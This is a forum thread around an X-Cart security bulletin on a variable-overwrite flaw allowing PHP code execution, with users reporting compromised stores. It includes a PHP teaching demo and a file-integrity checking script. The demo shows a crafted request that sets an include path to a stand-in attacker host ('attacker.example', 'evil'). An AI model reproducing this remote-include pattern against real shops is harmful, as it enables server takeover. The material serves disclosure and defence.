X-Cart: shopping cart software

X-Cart forums (https://forum.x-cart.com/index.php)
-   News and Announcements (https://forum.x-cart.com/forumdisplay.php?f=28)
-   -   Security bulletin 2008-25-12 (https://forum.x-cart.com/showthread.php?t=44440)

Ene 12-25-2008 03:52 AM

Security bulletin 2008-25-12
 
Dear X-Cart customer,

During internal audit activities, several moderate security issues have been detected in X-Cart. The issues make the software potentially
vulnerable to attackers who wish to gain access to the application back-end. The solution is to apply the update released by Qualiteam.

SEVERITY

Moderate

IMPACT

A malicious user can redeclare used variables, execute his own PHP code and, as a result, gain access to the application back-end, store database and server file system.

AFFECTED VERSIONS

All X-Cart versions from 4.0.0 to 4.1.11

SOLUTION

We strongly recommend that X-Cart users install the security fix available in the HelpDesk 'File Area'.
The following security improvements are included in the patch:
- protection from unauthorized access to the back-end, store database and server file system using specially formed GET or POST queries has been added.
- an extra protection level against SQL injections has been added.

Where to download the patch:

Please check your File Area:
* For X-Cart version 4.1.11:
check folders X-Cart -> X-Cart 4.1.11 (current version) -> Updates and patches

* For X-Cart versions 4.0.0 - 4.1.10:
check folders X-Cart -> X-Cart supporting files for prev versions -> {Your X-Cart branch} -> {Your X-Cart version} -> Updates and patches

Installation instructions can be found in the README.txt file attached to the .tgz archive.

NOTE:
If you are using X-Cart versions 4.1.0 - 4.1.11, please ensure you have installed all previous security fixes *prior to* applying this new patch.

If you have any questions or concerns, feel free to contact our support team via your Helpdesk.

X-Cart Team & Qualiteam Tech Support department
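The bulletin names the bug class ("redeclare used variables" through a specially formed GET or POST request) but shows no code. The following is an added illustration written for this page, not X-Cart's code and not the patched files: the function names, the $is_admin flag, $include_dir and the module paths are all hypothetical. It puts the variable-overwrite pattern beside a hardened form.

```php
<?php
// Added illustration of the bug class named in the bulletin. This is not
// X-Cart code: the function names, $is_admin, $include_dir and the module
// paths are hypothetical.

// Vulnerable pattern. With register_globals on (or an explicit extract() of
// $_GET/$_POST/$_REQUEST), every request parameter becomes a local variable,
// so a client can "redeclare" variables the script has already set.
function vulnerable_dispatch(array $request): string
{
    $is_admin    = false;                  // decided by the application...
    $include_dir = __DIR__ . '/modules';
    extract($request);                     // ...then overwritten by ?is_admin=1&include_dir=http://evil/
    if ($is_admin) {
        // attacker chooses the path; with allow_url_fopen=On this can be a remote file
        return "include $include_dir/admin.php";
    }
    return "include $include_dir/customer.php";
}

// Hardened pattern: read only the parameters you expect, allow-list their
// values, and keep trust decisions in variables the request can never touch.
function hardened_dispatch(array $request, bool $is_admin): string
{
    $allowed = ['customer', 'admin'];
    $mode = isset($request['mode']) ? (string) $request['mode'] : 'customer';
    if (!in_array($mode, $allowed, true)) {
        $mode = 'customer';
    }
    if ($mode === 'admin' && !$is_admin) {
        $mode = 'customer';   // privilege comes from the session, not the query string
    }
    return 'include ' . __DIR__ . "/modules/$mode.php";
}

// A request crafted the way the bulletin describes (constructed sample input).
$crafted = ['is_admin' => '1', 'include_dir' => 'http://attacker.example/x'];

echo vulnerable_dispatch($crafted), "\n";       // resolves to an attacker-controlled include path
echo hardened_dispatch($crafted, false), "\n";  // ignores both injected names, falls back to customer

// On PHP older than 5.4 (where the directive still exists), also confirm the
// global switch is off; on newer PHP ini_get() returns false here.
if (ini_get('register_globals')) {
    echo "WARNING: register_globals is on\n";
}
```

The functions return the resolved path instead of calling include so the example can be run safely; in a real script the string is what would be passed to include, which is where the "execute his own PHP code" step happens. Whether the overwrite comes from register_globals or from an explicit extract(), the fix is the same: request data must never populate the script's symbol table, and anything that selects a file or a privilege level must come from an allow-list or the session.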

Vacman 12-25-2008 07:39 AM

Re: Security bulletin 2008-25-12
 
Wow... Well thanks for posting these patches so quickly!

Emerson 12-25-2008 07:40 AM

Re: Security bulletin 2008-25-12
 
Yay, Merry Christmas :P

Emerson 12-25-2008 07:43 AM

Re: Security bulletin 2008-25-12
 
Ene,

Is this patch a revision of patch 2008-18-12?
Seems all the same files are being patched on both.

geckoday 12-25-2008 08:17 AM

Re: Security bulletin 2008-25-12
 
Quote:

NOTE:
If you are using X-Cart versions 4.1.0 - 4.1.11, please ensure you have installed all previous security fixes *prior to* applying this new patch.

Sounds like a patch to prior patches. At least for 4.1.x

Looking at 4.0.19, it patches register.php like the previous security patches, but not any of the same lines, so it can be applied independently (not sure why you would want to do that). It does mean you can't use the overwrite version if you have applied the prior security patches - use the diffs.

Ene 12-25-2008 09:12 AM

Re: Security bulletin 2008-25-12
 
Quote:

Is this patch a revision of patch 2008-18-12?

No. It is a different patch.

CLPeters 12-25-2008 11:20 AM

Re: Security bulletin 2008-25-12
 
I reported this vulnerability on the 21st when I found that someone had somehow installed a couple of fake Bank of America login pages on my server. I would strongly suggest that all users check their file system just to be safe.

The pages were loaded to my /payment/ directory on my server.

Also... if you don't need it to be on, "allow_url_fopen" in your php.ini should be off, as that will stop them from running scripts from other servers.
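The post above recommends checking the file system and turning off allow_url_fopen without saying how to do either systematically. As an added example (mine, not part of the thread and not an X-Cart tool), the script below compares a live web root against a manifest built from a clean copy of the same X-Cart version, flags additions that look like dropped pages or scripts, and reports the php.ini setting. The paths /tmp/xcart-clean and /var/www/xcart are assumptions.

```php
<?php
// Added example (not from the thread, not X-Cart code): a post-incident sweep
// of the kind suggested above. Paths are assumptions; the clean tree is meant
// to be unpacked from the distribution .tgz for your exact version.

function manifest(string $root): array
{
    $files = [];
    $root = rtrim((string) realpath($root), '/');
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $entry) {
        if ($entry->isFile()) {
            $rel = substr($entry->getPathname(), strlen($root) + 1);
            $files[$rel] = sha1_file($entry->getPathname());
        }
    }
    ksort($files);
    return $files;
}

// Returns the paths present only in $live, present in both with differing
// hashes, and present only in $clean.
function compare_manifests(array $clean, array $live): array
{
    $result = ['added' => [], 'modified' => [], 'removed' => []];
    foreach ($live as $path => $hash) {
        if (!isset($clean[$path])) {
            $result['added'][] = $path;        // e.g. a fake login page under payment/
        } elseif ($clean[$path] !== $hash) {
            $result['modified'][] = $path;     // e.g. a script with injected code
        }
    }
    foreach (array_keys($clean) as $path) {
        if (!isset($live[$path])) {
            $result['removed'][] = $path;
        }
    }
    return $result;
}

// Additions that can execute or render on their own deserve a look first:
// a stray .html or .php in a code directory is how the phishing pages showed up.
function suspicious_additions(array $added): array
{
    return array_values(array_filter($added, function ($p) {
        return preg_match('~\.(php\d?|phtml|html?|htm|cgi|pl)$~i', $p) === 1;
    }));
}

function allow_url_fopen_enabled(): bool
{
    return filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN);
}

// Usage (assumed paths).
$clean = manifest('/tmp/xcart-clean');
$live  = manifest('/var/www/xcart');
$diff  = compare_manifests($clean, $live);

foreach (suspicious_additions($diff['added']) as $p) {
    echo "ADDED:    $p\n";
}
foreach ($diff['modified'] as $p) {
    echo "MODIFIED: $p\n";
}
if (allow_url_fopen_enabled()) {
    echo "WARNING: allow_url_fopen is on in the running php.ini\n";
}
```

Expect the modified list to contain files you changed on purpose: config.php, skins, and the files the bulletin's patch touches (prepare.php, register.php, depending on version). Check those against the patch diff rather than assuming they are clean. Because the script runs with the web server's own PHP, run it from a cron or shell context and, if the host is already known to be compromised, prefer comparing from a separate machine against a copy of the files.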

photo 12-25-2008 12:24 PM

Re: Security bulletin 2008-25-12
 
There was only one file to update for version 4.1.10, prepare.php, so it was a pretty simple patch :)

concepts 12-27-2008 04:27 AM

Re: Security bulletin 2008-25-12
 
Just to clarify to everyone.

There are 2 patches:

One from Dec 18th

and a NEW one from the 25th.

We installed the one from the 18th but not the one from the 25th, and we got hacked.

bigredseo 12-27-2008 07:07 PM

Re: Security bulletin 2008-25-12
 
We're seeing a few people who have not applied the secondary patches and are now having issues. The news of the latest exploit seems to have spread pretty quickly.
